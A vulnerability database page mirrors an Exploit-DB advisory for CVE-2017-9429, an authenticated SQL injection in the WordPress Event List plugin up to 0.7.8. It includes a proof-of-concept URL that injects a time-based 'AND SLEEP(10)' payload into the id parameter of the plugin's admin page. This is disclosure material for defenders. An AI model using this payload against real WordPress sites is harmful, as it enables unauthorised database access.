Lucene search

K

WordPress Plugin Event List < 0.7.8 - SQL Injection

🗓️ 04 Jun 2017 00:00:00Reported by Dimitrios TsagkarakisType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

WordPress Plugin Event List SQL Injection vulnerability version 0.7.

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
WordPress Event List 0.7.8 SQL Injection
13 Jun 201700:00
packetstorm
NVD
CVE-2017-9429
13 Jun 201718:29
nvd
CVE
CVE-2017-9429
13 Jun 201718:29
cve
Cvelist
CVE-2017-9429
13 Jun 201718:00
cvelist
0day.today
WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability
14 Jun 201700:00
zdt
Prion
Sql injection
13 Jun 201718:29
prion
WPVulnDB
Event List <= 0.7.8 - Authenticated SQL Injection
4 Jun 201700:00
wpvulndb
Patchstack
WordPress Event List plugin <=0.7.8 - SQL Injection vulnerability
4 Jun 201700:00
patchstack
exploitpack
WordPress Plugin Event List 0.7.8 - SQL Injection
4 Jun 201700:00
exploitpack
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu 
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps

 

1. Description:

   

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php. 

 

2. Proof of Concept:

 

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)

 

3. Solution:

   

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.

 

4. Reference:

 

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

 

 

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo